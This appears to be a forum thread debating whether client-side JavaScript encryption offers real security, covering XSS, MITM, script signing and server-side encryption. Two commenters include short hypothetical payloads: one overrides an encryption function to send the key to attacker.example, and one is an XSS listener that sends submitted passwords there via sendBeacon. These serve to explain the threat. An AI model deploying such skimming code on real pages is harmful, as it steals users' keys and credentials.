Could anyone explain what the use case is for encrypting text on a web page using JavaScript? I don't understand how this library is useful except for situations where it's used in Chrome extensions, like the one LastPass uses.
If this lib is used on a page to decrypt/encrypt user data before sending it to the server, theoretically it's possible for the host to steal the private key simply by injecting JS code that copies the user's private key.
It's worse than that. Among many other things, any attacker with an XSS bug in any component that ends up in that page's DOM (cached or fetched fresh) can steal keys. Modern browsers provide no way to verify the whole JS runtime to ensure that no function your crypto depends on has been backdoored, and every JS implementation allows functions to be overridden.
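To make the "functions can be overridden" point concrete, here is roughly what a single injected script can do. (window.myCrypto.encrypt is a made-up name standing in for whatever encryption function the page's library exposes, and attacker.example is obviously hypothetical.)

    // Hypothetical injected payload; "myCrypto.encrypt" is a stand-in for
    // whatever encryption function the page's library exposes.
    var realEncrypt = window.myCrypto.encrypt;
    window.myCrypto.encrypt = function (key, plaintext) {
      // Exfiltrate the key via an innocuous-looking image request...
      new Image().src = 'https://attacker.example/c?k=' + encodeURIComponent(key);
      // ...then behave exactly like the original so nothing looks wrong.
      return realEncrypt.apply(this, arguments);
    };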
It's the worst possible environment to implement crypto in, and you should never do it.
XSS is in your own control (as a site owner/developer), and it is less likely to happen than the user's machine being infested with malware to begin with. And the malware-infestation threat has never stopped anyone from advocating native (non-browser) crypto, right?
The difference between normal software and browser javascript is that browser javascript is effectively re-installed every time you visit a web page. People install new software packages less than once a week.
This is a nerdy argument I'm not particularly interested in hashing out again, so you're welcome to the last word.
Your argument here looks like, "other things have vulnerabilities, and JavaScript has vulnerabilities, so it is equivalent to other mechanisms."
If that is your argument, then the conclusion is wrong, because JavaScript implementations are vulnerable to everything that everything else is vulnerable to, and then some.
There is nothing that a JavaScript implementation actually protects you from.
That's not my argument at all. My argument is that the probability of a well-designed site having XSS (p1) is much less than that of a user's machine being infested (p2). When you start using both, as you say, we end up with a compound breach probability of roughly p1 + p2 (exact expression below), which is strictly worse than p2 alone, but if p1 << p2 we are not losing much to begin with, and it may be justified if we're gaining as much or more elsewhere.
In other words, global optimization may require local pessimization.
E.g. if we gave the user the ability to store secret data without the key ever leaving his possession, he might be more likely to use the service and stop storing his secrets in a notepad file. However, if we don't guarantee that the key will not leave the user's possession, the user may decide not to use the service.
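For precision, and assuming the two failure modes are independent (itself an assumption), the exact combined probability is:

    P(breach) = 1 - (1 - p1)(1 - p2) = p1 + p2 - p1*p2 ≈ p1 + p2    (when p1 and p2 are small)

so the p1 + p2 approximation above is fine for small probabilities.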
> ...and it may be justified if we're gaining as much or more elsewhere.
Except that, in terms of real security, we aren't. That's the whole point. You're right in describing it in the way you did, but then you get to this point where there's this implicit assumption that JavaScript-based crypto gains you something. Which, maybe, leads into your next point...
> E.g. if we gave the user the ability to store secret data without the key ever leaving his possession, he might be more likely to use the service and stop storing his secrets in a notepad file.
OK, but this is a different problem. The correct solution here is a true client-side app or a browser add-on (and even then ... ehhhh). Otherwise -- and this is a point that I don't feel like I can emphasize enough -- you are giving your users a completely false sense of security. You're selling a service by saying that "we'll store your secrets for you and you don't even have to ever give us your key, so it's more secure than keeping them in a notepad file", but that's demonstrably false.
> However, if we don't guarantee that the key will not leave the user's possession, the user may decide not to use the service.
Also a different problem. You can't sell security this way. All you're doing is taking advantage of people's ignorance. If everybody understood the security risks of JavaScript-implemented crypto, and you sold the same service -- "we use JS so you never have to share your keys" -- then the users would decide not to use the service!
To reiterate:
1. Server-side encryption is a real protection from accidental or malicious data leaks (db dumps);
2. SSL is a real protection from MITM and eavesdropping (mostly, with caveats);
3. If the server software gets compromised, you're pooched no matter what.
So, again: JavaScript solves none of these problems.
The only thing that JavaScript does, is add more problems.
>You're selling a service by saying that "we'll store your secrets for you and you don't even have to ever give us your key, so it's more secure than keeping them in a notepad file", but that's demonstrably false.
Now, aren't you getting carried away? Physical loss of a laptop will compromise the notepad file, but not the client-side-encrypted data. Malware on the laptop will compromise the notepad file 100% of the time, but any crypto-based solution will only be compromised if it's actually used while the malware is present. Fire, flood, or theft will deprive the user of locally stored secrets altogether.
Seriously, are you claiming that a notepad file is more secure than a server-based storage with client or server encryption? That's an extraordinary claim.
1. That notepad file can be encrypted on the laptop; and
2. "Web app" programmers so often get security really wrong. This entire thread is just one of a huge number of examples of that.
Honestly, any hosted solution that relied on JS for encryption or authentication would encourage me to keep storing secrets in text files on my laptop.
Here's a fun, easy way to understand why hosted solutions are rarely a good idea for storing private data:
- Make a chart with four columns;
- Column 1 is "Unencrypted local storage"; column 2 is "Encrypted local storage"; column 3 is "Remote storage with JavaScript encryption"; column 4 is "Remote storage with SSL + server-side encryption";
- Under each column, write down a list of every method you can think of by which that particular system could be broken. Take your time and be creative.
- Cross out any methods that all of the columns have in common.
How is this any different from an XSS bug resulting in an attacker stealing the plaintext password from a form?
Also, given that the client and the server trust each other and communicate securely, doesn't this just get reduced to the probability of having these bugs and nothing more?
If the client and the server can trust each other, then JavaScript encryption literally adds no benefit.
Think of it this way: your browser contains some areas whose sole responsibility is to verify the authenticity of a remote server (SSL), and those areas are completely inaccessible from the DOM. So, basically, as long as you can trust your web browser, then you can trust the connection.
But those protections don't exist for JavaScript. An attacker could compromise your server, rewrite your JS, and you'd never notice. (No JS signing capabilities in the browser; no TOFU/POP style architecture.) An attacker could use an SQL injection on your CMS to leave a comment that uses XSS to modify your JS encryption while it's running, and you'd never notice. You could be on an unsecured network and someone could MITM rewrite your JavaScript in-flight, or, in the cases of bad JS crypto implementations (which almost every single one is), simply use a replay attack at their leisure.
There are all kinds of really neat ways to attack JavaScript.
It's true that there are almost as many ways to attack any other authentication/encryption system. But the point is that JavaScript adds no extra security at all: it is at least as vulnerable to any of these as anything else, it adds a false sense of security, it is vulnerable to things that SSL is not, and in some of these scenarios you will get absolutely no indication that you've been compromised.
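To give one concrete flavour of the "XSS via a stored comment" case: an injected payload doesn't even need to touch your crypto code, it can just grab the plaintext first. (Everything here is hypothetical: the field selector and the attacker URL are made up.)

    // Purely illustrative XSS payload. A capture-phase listener on document
    // runs before the page's own submit handler, so the secret is read
    // before any client-side encryption happens.
    document.addEventListener('submit', function (e) {
      var field = e.target.querySelector('input[type=password], #secret');
      if (field) {
        navigator.sendBeacon('https://attacker.example/collect', field.value);
      }
    }, true);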
Suppose you want to store confidential data with the server. You trust the server owners to be the good guys, but you also know that data breaches happen (e.g. equipment theft, FBI seizures, backup tape leaks), so if/when a breach happens the thieves will have made off with an encrypted copy of your data. The only way your data is jeopardized is in one of two cases:
1. The people maintaining the service turned out to be not trustworthy, and have been harvesting the keys all along.
2. The hackers took control of the server and injected code to harvest the encryption keys for long enough to catch you in the net.
If you look at the relative probabilities of these two events compared to a straight-up data leak, we're looking at an orders-of-magnitude reduction in risk. Most people who did the right thing in the past are in the habit of doing the right thing, so you can lean on the host's reputation - we've been doing that for thousands of years. Code injection on the site is much less likely than the data leak, and it is a lot less fruitful for the attacker, as he would have to sit there undetected and wait for enough users to punch in their keys.
No, it doesn't. JS implementations suffer from all the same flaws that everything else does, plus a few more, and it offers no protection from any flaws that anything else is vulnerable to.
"You can never be completely secure" is not a good justification for security theatre.
Well, not really: if you can verify the scripts that are loaded (side-loading JavaScript would require a targeted attack that compromised either the server or the Google API, or a malicious extension), then you get end-to-end encryption for the user, as opposed to having to send plaintext over the wire.
How exactly would you implement a browser-based crypto solution?
That, plus a notification to the user if the signed JS has changed since the last time it was loaded, with SHA hashes of the scripts (and other data) stored directly in the browser in a way not accessible from the DOM.
Since in-page scripts could still rewrite the functions of the loaded JS on the fly, those functions would have to be provided read-only by the browser, or there would have to be some kind of out-of-DOM API for working with them.
My hope would be that we'd see a handful of signed libraries provided and reviewed by cryptographers and that they wouldn't change very often because it would be a pain in the ass when they did.
But: I am not a cryptographer or even a qualified security expert. There is probably a good reason not to do it this way.
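For concreteness, the hash-pinning half of that idea can even be approximated in-page today with SubtleCrypto. This is only a sketch to show the shape of it (expectedHex is a placeholder), and the obvious objection stands: the check itself is just more JavaScript running in the same untrusted page.

    // Rough sketch: fetch a script, compare its SHA-256 against a pinned
    // value, and refuse to run it if the hash has changed.
    async function loadPinnedScript(url, expectedHex) {
      var src = await (await fetch(url)).text();
      var digest = await crypto.subtle.digest('SHA-256', new TextEncoder().encode(src));
      var hex = Array.from(new Uint8Array(digest))
        .map(function (b) { return b.toString(16).padStart(2, '0'); })
        .join('');
      if (hex !== expectedHex) {
        throw new Error('Pinned script ' + url + ' has changed since it was reviewed');
      }
      var el = document.createElement('script');
      el.textContent = src; // run only the verified source
      document.head.appendChild(el);
    }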
How is this a justification for JavaScript crypto? It might be a justification for some form of crypto, but if that's the case, why not stick with SSL + server-side encryption?
Either will work for the given scenario. The only difference I see is that with client-side crypto you can't accidentally write the key into a server log file, whereas with server-side crypto that is possible.
But then again, at some point you will add some logging to the client-side code as well, so the point will be moot - you will have to sanitize logs at the point of production either way.
Another thing is that it makes for much better messaging - "the encryption key never leaves your machine".
Why do you think the other method does not have the same weaknesses? If the browser is compromised, the key that the user enters into the web page is leaked, regardless of whether you use client-side or server-side crypto. The fact that, with client-side crypto, the code itself could have been tampered with in addition to the encryption key does not add anything to the threat... does it? The key is already presumed to have been leaked, and things cannot get any worse than that.
As far as security is concerned, the two are equally (in)secure. And client-side crypto still has the advantage that key management is much easier to explain to the user, thus the app is more likely to be used.
> Why do you think the other method does not have the same weaknesses?
Trivially: JavaScript encryption is vulnerable to MITM attacks that SSL is not. The only solution to this is to deliver your JS over SSL, but browsers will complain if you try to mix https and non-https elements in a page, and you might as well serve the whole page over https anyway. If you do that, then you still don't need the JavaScript crypto. (As one example; I know there are others, but I just came in from the yard and my brain is a little melty right now.)
> As far as security is concerned, the two are equally (in)secure.
This is a statement which flies in the face of the recommendations of some very smart people in the security field, some of whom have written extensive posts which have been linked to in this thread.
Even if I didn't (barely) know enough to evaluate your claims on my own, I could conclude that you might be right ... but I wouldn't bet on it.
Look, this subject has been discussed to death and ad nauseam, including here on HN. There have been extensive essays written about it. If you don't want to believe me, I'm OK with that. Go read their stuff, and see if it makes more sense to you.
If, after reading all of that, you still think you have some new insight in the field that everyone else has overlooked, and you can show why JavaScript is "equally (in)secure" to SSL + server-side encryption, then make your own blog post or essay about it. Make it good and in-depth, link to it from HN, tell everyone about it. I'd be happy to read it.
Otherwise you and I are just going in circles and not getting anywhere.
Update:
I should probably note that I haven't looked at the implementation, and there's no way I'd do what I describe above without having complete control of the sources.